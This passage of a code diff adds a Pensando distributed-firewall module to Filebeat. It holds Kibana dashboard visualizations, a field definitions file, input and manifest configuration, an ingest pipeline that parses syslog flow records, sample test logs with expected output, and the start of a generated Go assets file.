"schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "", + "exclude": "denied", + "field": "event.action", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": false + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 30, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "DFW Allowed Count [Filebeat Pensando]", + "type": "metric" + } + }, + "id": "fa745d10-cc88-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:55:19.408Z", + "version": "WzI0ODQsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "DFW Denied Count [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "packet count" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "", + "exclude": "allowed", + "field": "event.action", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": false + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 30, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "DFW Denied Count [Filebeat Pensando]", + "type": "metric" + } + }, + "id": "1d2d5f00-cc89-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T22:21:26.142Z", + "version": "WzI1NDAsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": "Denied Destination IPs", + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.action", + "negate": false, + "params": { + "query": "denied" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.action": "denied" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "event.action: \"denied\" " + } + } + }, + "title": "Denied Destination IPs [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "server.ip", + "json": "", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 25 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "maxFontSize": 36, + "minFontSize": 14, + "orientation": "single", + "scale": "linear", + "showLabel": false + }, + "title": "Denied Destination IPs [Filebeat Pensando]", + "type": "tagcloud" + } + }, + "id": "bf9d4650-cc8a-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:57:10.267Z", + "version": "WzI0ODgsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Traffic by Workload Pie [Filebeat Pensando]", + "uiStateJSON": { + "vis": { + "legendOpen": false + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "client.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 25 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "isDonut": false, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "type": "pie" + }, + "title": "Traffic by Workload Pie [Filebeat Pensando]", + "type": "pie" + } + }, + "id": "07983660-cd38-11ea-a0ef-8f5241e594be", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:57:31.753Z", + "version": "WzI0ODksMTFd" + }, + { + "attributes": { + "description": "Inner ring is client IP, middle ring is server IP and the outer ring is Allow vs Deny actions performed by the FW", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Client to Server FW Action [Filebeat Pensando]", + "uiStateJSON": { + "vis": { + "legendOpen": false + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "client.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 100 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "server.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "4", + "params": { + "field": "event.action", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": false + }, + "legendPosition": "right", + "type": "pie" + }, + "title": "Client to Server FW Action [Filebeat Pensando]", + "type": "pie" + } + }, + "id": "fd2202d0-cc86-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:56:22.329Z", + "version": "WzI0ODYsMTFd" + }, + { + "attributes": { + "description": "Firewall denies and allows plotted against each other in time series", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "DFW Deny vs Allow [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [], + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "default_index_pattern": "filebeat-*", + "default_timefield": "@timestamp", + "filter": { + "language": "kuery", + "query": "event.dataset:\"pensando.dfw\" " + }, + "id": "61ca57f0-469d-11e7-af02-69e470af7417", + "index_pattern": "filebeat-*", + "interval": "", + "isModelInvalid": false, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "filter": { + "language": "kuery", + "query": "pensando.dfw.action : \"allow\" " + }, + "formatter": "number", + "id": "61ca57f1-469d-11e7-af02-69e470af7417", + "line_width": 1, + "metrics": [ + { + "id": "61ca57f2-469d-11e7-af02-69e470af7417", + "type": "count" + } + ], + "point_size": 1, + "separate_axis": 0, + "split_color_mode": "kibana", + "split_mode": "terms", + "stacked": "none", + "terms_field": "pensando.dfw.action" + }, + { + "axis_position": "right", + "chart_type": "line", + "color": "rgba(150,10,3,1)", + "fill": 0.5, + "filter": { + "language": "kuery", + "query": "pensando.dfw.action : \"deny\" " + }, + "formatter": "number", + "id": "b6c562c0-cc84-11ea-a4da-c770c13b4387", + "line_width": 1, + "metrics": [ + { + "id": "b6c562c1-cc84-11ea-a4da-c770c13b4387", + "type": "count" + } + ], + "point_size": 1, + "separate_axis": 0, + "split_mode": "terms", + "stacked": "none", + "terms_field": "pensando.dfw.action" + }, + { + "axis_position": "right", + "chart_type": "line", + "color": "rgba(188,186,0,1)", + "fill": 0.5, + "filter": { + "language": "kuery", + "query": "pensando.dfw.action :\"none\" " + }, + "formatter": "number", + "id": "2dd6bef0-cd1f-11ea-98bc-ef8e168e330d", + "line_width": 1, + "metrics": [ + { + "id": "2dd6bef1-cd1f-11ea-98bc-ef8e168e330d", + "type": "count" + } + ], + "point_size": 1, + "separate_axis": 0, + "split_mode": "terms", + "stacked": "none", + "terms_field": "pensando.dfw.action" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "@timestamp", + "type": "timeseries" + }, + "title": "DFW Deny vs Allow [Filebeat Pensando]", + "type": "metrics" + } + }, + "id": "2aa5d850-cc85-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [], + "type": "visualization", + "updated_at": "2020-09-10T21:54:41.152Z", + "version": "WzI0ODAsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "Top Destination IPs [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "destination.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "isDonut": false, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "type": "pie" + }, + "title": "Top Destination IPs [Filebeat Pensando]", + "type": "pie" + } + }, + "id": "b8bfd3e0-e8b7-11ea-ba07-c1efedbf0bf9", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "0d0216f0-2fe0-11e7-9d02-3f49bde5c1d5", + "name": "search_0", + "type": "search" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:59:43.129Z", + "version": "WzI0OTYsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Destination Port by DSC Pie [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "destination.port", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 25 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "log.source.address", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "type": "pie" + }, + "title": "Destination Port by DSC Pie [Filebeat Pensando]", + "type": "pie" + } + }, + "id": "c6188140-cdb9-11ea-a0ef-8f5241e594be", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:58:55.571Z", + "version": "WzI0OTQsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Top Destinations - table [Filebeat Pensando]", + "uiStateJSON": { + "vis": { + "params": { + "sort": { + "columnIndex": null, + "direction": null + } + } + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Network Packets" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Top Servers", + "field": "server.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 300 + }, + "schema": "bucket", + "type": "terms" + } + ], + "params": { + "perPage": 10, + "percentageCol": "", + "showMetricsAtAllLevels": true, + "showPartialRows": true, + "showTotal": false, + "sort": { + "columnIndex": null, + "direction": null + }, + "totalFunc": "sum" + }, + "title": "Top Destinations - table [Filebeat Pensando]", + "type": "table" + } + }, + "id": "0583e120-cc8f-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T22:27:54.232Z", + "version": "WzI1NTAsMTFd" + } + ], + "version": "7.8.0" +} diff --git a/filebeat/module/pensando/dfw/_meta/fields.yml b/filebeat/module/pensando/dfw/_meta/fields.yml new file mode 100644 index 000000000000..72422c321214 --- /dev/null +++ b/filebeat/module/pensando/dfw/_meta/fields.yml @@ -0,0 +1,55 @@ +- name: dfw + type: group + release: beta + default_field: false + description: > + Fields for Pensando DFW + fields: + - name: action + type: keyword + description: > + Action on the flow. + - name: app_id + type: integer + description: > + Application ID + - name: destination_address + type: keyword + description: > + Address of destination. + - name: destination_port + type: integer + description: > + Port of destination. + - name: direction + type: keyword + description: > + Direction of the flow + - name: protocol + type: keyword + description: > + Protocol of the flow + - name: rule_id + type: keyword + description: > + Rule ID that was matched. + - name: session_id + type: integer + description: > + Session ID of the flow + - name: session_state + type: keyword + description: > + Session state of the flow. + - name: source_address + type: keyword + description: > + Source address of the flow. + - name: source_port + type: integer + description: > + Source port of the flow. + - name: timestamp + type: date + description: > + Timestamp of the log. diff --git a/filebeat/module/pensando/dfw/config/dfw.yml b/filebeat/module/pensando/dfw/config/dfw.yml new file mode 100644 index 000000000000..404eac5f138f --- /dev/null +++ b/filebeat/module/pensando/dfw/config/dfw.yml @@ -0,0 +1,23 @@ +{{ if eq .input "syslog" }} + +type: udp +udp: +host: "{{.syslog_host}}:{{.syslog_port}}" + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +processors: + - add_locale: ~ + - add_fields: + target: '' + fields: + ecs.version: 1.7.0 diff --git a/filebeat/module/pensando/dfw/ingest/pipeline.yml b/filebeat/module/pensando/dfw/ingest/pipeline.yml new file mode 100644 index 000000000000..c8d1d57792fa --- /dev/null +++ b/filebeat/module/pensando/dfw/ingest/pipeline.yml @@ -0,0 +1,218 @@ +--- +description: Pipeline for parsing Penando DFW logs +processors: +- set: + field: event.ingested + value: "{{_ingest.timestamp}}" +- rename: + field: message + target_field: event.original +- grok: + field: event.original + patterns: + - "%{SYSLOG5424PRI}%{NONNEGINT:syslog5424_ver} +(?:%{TIMESTAMP_ISO8601:syslog5424_ts}|-) +(?:%{IPORHOST:syslog5424_host}|-) +(-|%{SYSLOG5424PRINTASCII:syslog5424_app}) +(-|%{SYSLOG5424PRINTASCII:syslog5424_proc}) +(?::-|%{SYSLOG5424PRINTASCII:syslog5424_msgid}) +\\[%{GREEDYDATA:payload_raw}\\]$" +- json: + field: payload_raw + target_field: json +- remove: + field: [syslog5424_sd,syslog5424_app,syslog5424_host,syslog5424_msgid,syslog5424_pri,syslog5424_proc,syslog5424_ver,host] + ignore_missing: true +- date: + field: json.time + target_field: '@timestamp' + ignore_failure: true + formats: + - ISO8601 +- rename: + field: json.action + target_field: pensando.dfw.action + ignore_failure: true +- rename: + field: json.app-id + target_field: pensando.dfw.app_id + ignore_failure: true +- rename: + field: json.destaddr + target_field: pensando.dfw.destination_address + ignore_failure: true +- rename: + field: json.destport + target_field: pensando.dfw.destination_port + ignore_failure: true +- rename: + field: json.direction + target_field: pensando.dfw.direction + ignore_failure: true +- rename: + field: json.protocol + target_field: pensando.dfw.protocol + ignore_failure: true +- rename: + field: json.rule-id + target_field: pensando.dfw.rule_id + ignore_failure: true +- rename: + field: json.session-id + target_field: pensando.dfw.session_id + ignore_failure: true +- rename: + field: json.session-state + target_field: pensando.dfw.session_state + ignore_failure: true +- rename: + field: json.srcaddr + target_field: pensando.dfw.source_address + ignore_failure: true +- rename: + field: json.srcport + target_field: pensando.dfw.source_port + ignore_failure: true +- set: + field: event.category + value: ['network'] +- set: + field: observer.vendor + value: Pensando Systems +- set: + field: observer.type + value: 'firewall' +- set: + field: observer.product + value: 'Distributed Services Platform' +- set: + field: network.type + value: 'ipv4' +- set: + field: network.transport + value: '{{pensando.dfw.protocol}}' + ignore_failure: true +- lowercase: + field: network.transport + ignore_missing: true + ignore_failure: true +- set: + field: source.address + value: "{{pensando.dfw.source_address}}" + ignore_failure: true + ignore_empty_value: true +- convert: + field: pensando.dfw.source_port + target_field: source.port + type: integer + ignore_failure: true + ignore_missing: true +- set: + field: destination.address + value: "{{pensando.dfw.destination_address}}" + ignore_failure: true + ignore_empty_value: true +- convert: + field: pensando.dfw.destination_port + target_field: destination.port + type: integer + ignore_failure: true + ignore_missing: true +- set: + field: client.ip + value: '{{pensando.dfw.source_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.source_port > ctx.pensando.dfw?.destination_port +- set: + field: client.ip + value: '{{pensando.dfw.destination_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.destination_port > ctx.pensando.dfw?.source_port +- set: + field: client.ip + value: '{{pensando.dfw.source_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.protocol == 'ICMP' +- set: + field: server.ip + value: '{{pensando.dfw.source_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.source_port < ctx.pensando.dfw?.destination_port +- set: + field: server.ip + value: '{{pensando.dfw.destination_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.destination_port < ctx.pensando.dfw?.source_port +- set: + field: server.ip + value: '{{pensando.dfw.destination_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.protocol == 'ICMP' +- set: + field: server.port + value: '{{pensando.dfw.source_port}}' + ignore_failure: true + if: ctx.pensando.dfw?.source_port < ctx.pensando.dfw?.destination_port +- set: + field: server.port + value: '{{pensando.dfw.destination_port}}' + ignore_failure: true + if: ctx.pensando.dfw?.destination_port < ctx.pensando.dfw?.source_port +- set: + field: server.port + value: 0 + ignore_failure: true + if: ctx.pensando.dfw?.protocol == 'ICMP' +- set: + field: event.kind + value: 'event' +- set: + field: event.action + value: 'allowed' + if: '[''allow''].contains(ctx.pensando.dfw?.action)' +- set: + field: rule.id + value: '{{pensando.dfw.rule_id}}' + ignore_failure: true +- set: + field: event.outcome + value: success + if: '[''allow'', ''deny''].contains(ctx.pensando.dfw?.action)' +- set: + field: event.action + value: denied + if: '[''deny''].contains(ctx.pensando.dfw?.action)' +- set: + field: event.type + value: ['connection', 'allowed'] + if: '[''allow''].contains(ctx.pensando.dfw?.action)' + ignore_failure: true +- set: + field: event.type + value: ['connection', 'denied'] + if: '[''deny''].contains(ctx.pensando.dfw?.action)' + ignore_failure: true +- geoip: + field: pensando.dfw.source_address + target_field: source.geo + ignore_missing: true +- geoip: + database_file: GeoLite2-ASN.mmdb + field: pensando.dfw.source_address + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true +- rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true +- rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true +- remove: + field: + - syslog5424_ts + - json + - payload_raw + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/filebeat/module/pensando/dfw/manifest.yml b/filebeat/module/pensando/dfw/manifest.yml new file mode 100644 index 000000000000..5de3a9735476 --- /dev/null +++ b/filebeat/module/pensando/dfw/manifest.yml @@ -0,0 +1,13 @@ +module_version: 1.0 + +var: + - name: syslog_host + default: 0.0.0.0 + - name: syslog_port + default: 9001 + - name: input + default: syslog + +ingest_pipeline: + - ingest/pipeline.yml +input: config/dfw.yml diff --git a/filebeat/module/pensando/dfw/test/test.log b/filebeat/module/pensando/dfw/test/test.log new file mode 100644 index 000000000000..bf582967660e --- /dev/null +++ b/filebeat/module/pensando/dfw/test/test.log @@ -0,0 +1,3 @@ +<14>1 2020-12-14T18:41:01Z esx01-dsc pen-tmagent 1402 - [{"time":"2020-12-14T18:41:01Z","destaddr":"10.29.95.101","destport":80,"srcaddr":"10.29.95.102","srcport":46554,"protocol":"TCP","action":"allow","direction":"from-host","rule-id":5413257681574708646,"session-id":6881552,"session-state":"flow_create"}] +<14>1 2020-12-14T18:41:16Z esx01-dsc pen-tmagent 1402 - [{"time":"2020-12-14T18:41:16Z","destaddr":"10.29.95.101","destport":80,"srcaddr":"10.29.95.102","srcport":46594,"protocol":"TCP","action":"allow","direction":"from-host","rule-id":5413257681574708646,"session-id":6881572,"session-state":"flow_create"}] +<14>1 2020-12-14T18:41:16Z esx01-dsc pen-tmagent 1402 - [{"time":"2020-12-14T18:41:16Z","destaddr":"10.29.95.101","destport":80,"srcaddr":"10.29.95.102","srcport":46582,"protocol":"TCP","action":"allow","direction":"from-host","rule-id":5413257681574708646,"session-id":6881566,"session-state":"flow_create"}] diff --git a/filebeat/module/pensando/dfw/test/test.log-expected.json b/filebeat/module/pensando/dfw/test/test.log-expected.json new file mode 100644 index 000000000000..d43ffdea29c5 --- /dev/null +++ b/filebeat/module/pensando/dfw/test/test.log-expected.json @@ -0,0 +1,134 @@ +[ + { + "@timestamp": "2020-12-14T18:41:01.000Z", + "client.ip": "10.29.95.102", + "destination.address": "10.29.95.101", + "destination.port": 80, + "event.action": "allowed", + "event.category": [ + "network" + ], + "event.dataset": "pensando.dfw", + "event.kind": "event", + "event.module": "pensando", + "event.original": "<14>1 2020-12-14T18:41:01Z esx01-dsc pen-tmagent 1402 - [{\"time\":\"2020-12-14T18:41:01Z\",\"destaddr\":\"10.29.95.101\",\"destport\":80,\"srcaddr\":\"10.29.95.102\",\"srcport\":46554,\"protocol\":\"TCP\",\"action\":\"allow\",\"direction\":\"from-host\",\"rule-id\":5413257681574708646,\"session-id\":6881552,\"session-state\":\"flow_create\"}]", + "event.outcome": "success", + "event.timezone": "-02:00", + "event.type": [ + "connection", + "allowed" + ], + "fileset.name": "dfw", + "input.type": "log", + "log.offset": 0, + "network.transport": "tcp", + "network.type": "ipv4", + "observer.product": "Distributed Services Platform", + "observer.type": "firewall", + "observer.vendor": "Pensando Systems", + "pensando.dfw.action": "allow", + "pensando.dfw.destination_address": "10.29.95.101", + "pensando.dfw.destination_port": 80, + "pensando.dfw.direction": "from-host", + "pensando.dfw.protocol": "TCP", + "pensando.dfw.rule_id": 5413257681574708646, + "pensando.dfw.session_id": 6881552, + "pensando.dfw.session_state": "flow_create", + "pensando.dfw.source_address": "10.29.95.102", + "pensando.dfw.source_port": 46554, + "rule.id": "5413257681574708646", + "server.ip": "10.29.95.101", + "server.port": "80", + "service.type": "pensando", + "source.address": "10.29.95.102", + "source.port": 46554 + }, + { + "@timestamp": "2020-12-14T18:41:16.000Z", + "client.ip": "10.29.95.102", + "destination.address": "10.29.95.101", + "destination.port": 80, + "event.action": "allowed", + "event.category": [ + "network" + ], + "event.dataset": "pensando.dfw", + "event.kind": "event", + "event.module": "pensando", + "event.original": "<14>1 2020-12-14T18:41:16Z esx01-dsc pen-tmagent 1402 - [{\"time\":\"2020-12-14T18:41:16Z\",\"destaddr\":\"10.29.95.101\",\"destport\":80,\"srcaddr\":\"10.29.95.102\",\"srcport\":46594,\"protocol\":\"TCP\",\"action\":\"allow\",\"direction\":\"from-host\",\"rule-id\":5413257681574708646,\"session-id\":6881572,\"session-state\":\"flow_create\"}]", + "event.outcome": "success", + "event.timezone": "-02:00", + "event.type": [ + "connection", + "allowed" + ], + "fileset.name": "dfw", + "input.type": "log", + "log.offset": 311, + "network.transport": "tcp", + "network.type": "ipv4", + "observer.product": "Distributed Services Platform", + "observer.type": "firewall", + "observer.vendor": "Pensando Systems", + "pensando.dfw.action": "allow", + "pensando.dfw.destination_address": "10.29.95.101", + "pensando.dfw.destination_port": 80, + "pensando.dfw.direction": "from-host", + "pensando.dfw.protocol": "TCP", + "pensando.dfw.rule_id": 5413257681574708646, + "pensando.dfw.session_id": 6881572, + "pensando.dfw.session_state": "flow_create", + "pensando.dfw.source_address": "10.29.95.102", + "pensando.dfw.source_port": 46594, + "rule.id": "5413257681574708646", + "server.ip": "10.29.95.101", + "server.port": "80", + "service.type": "pensando", + "source.address": "10.29.95.102", + "source.port": 46594 + }, + { + "@timestamp": "2020-12-14T18:41:16.000Z", + "client.ip": "10.29.95.102", + "destination.address": "10.29.95.101", + "destination.port": 80, + "event.action": "allowed", + "event.category": [ + "network" + ], + "event.dataset": "pensando.dfw", + "event.kind": "event", + "event.module": "pensando", + "event.original": "<14>1 2020-12-14T18:41:16Z esx01-dsc pen-tmagent 1402 - [{\"time\":\"2020-12-14T18:41:16Z\",\"destaddr\":\"10.29.95.101\",\"destport\":80,\"srcaddr\":\"10.29.95.102\",\"srcport\":46582,\"protocol\":\"TCP\",\"action\":\"allow\",\"direction\":\"from-host\",\"rule-id\":5413257681574708646,\"session-id\":6881566,\"session-state\":\"flow_create\"}]", + "event.outcome": "success", + "event.timezone": "-02:00", + "event.type": [ + "connection", + "allowed" + ], + "fileset.name": "dfw", + "input.type": "log", + "log.offset": 622, + "network.transport": "tcp", + "network.type": "ipv4", + "observer.product": "Distributed Services Platform", + "observer.type": "firewall", + "observer.vendor": "Pensando Systems", + "pensando.dfw.action": "allow", + "pensando.dfw.destination_address": "10.29.95.101", + "pensando.dfw.destination_port": 80, + "pensando.dfw.direction": "from-host", + "pensando.dfw.protocol": "TCP", + "pensando.dfw.rule_id": 5413257681574708646, + "pensando.dfw.session_id": 6881566, + "pensando.dfw.session_state": "flow_create", + "pensando.dfw.source_address": "10.29.95.102", + "pensando.dfw.source_port": 46582, + "rule.id": "5413257681574708646", + "server.ip": "10.29.95.101", + "server.port": "80", + "service.type": "pensando", + "source.address": "10.29.95.102", + "source.port": 46582 + } +] \ No newline at end of file diff --git a/filebeat/module/pensando/fields.go b/filebeat/module/pensando/fields.go new file mode 100644 index 000000000000..e791a74dfa93 --- /dev/null +++ b/filebeat/module/pensando/fields.go @@ -0,0 +1,36 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +// Code generated by beats/dev-tools/cmd/asset/asset.go - DO NOT EDIT. + +package pensando + +import ( + "github.com/elastic/beats/v7/libbeat/asset" +) + +func init() { + if err := asset.SetFields("filebeat", "pensando", asset.ModuleFieldsPri, AssetPensando); err != nil { + panic(err) + } +} + +// AssetPensando returns asset data. +// This is the base64 encoded gzipped contents of module/pensando. +func AssetPensando() string { + return 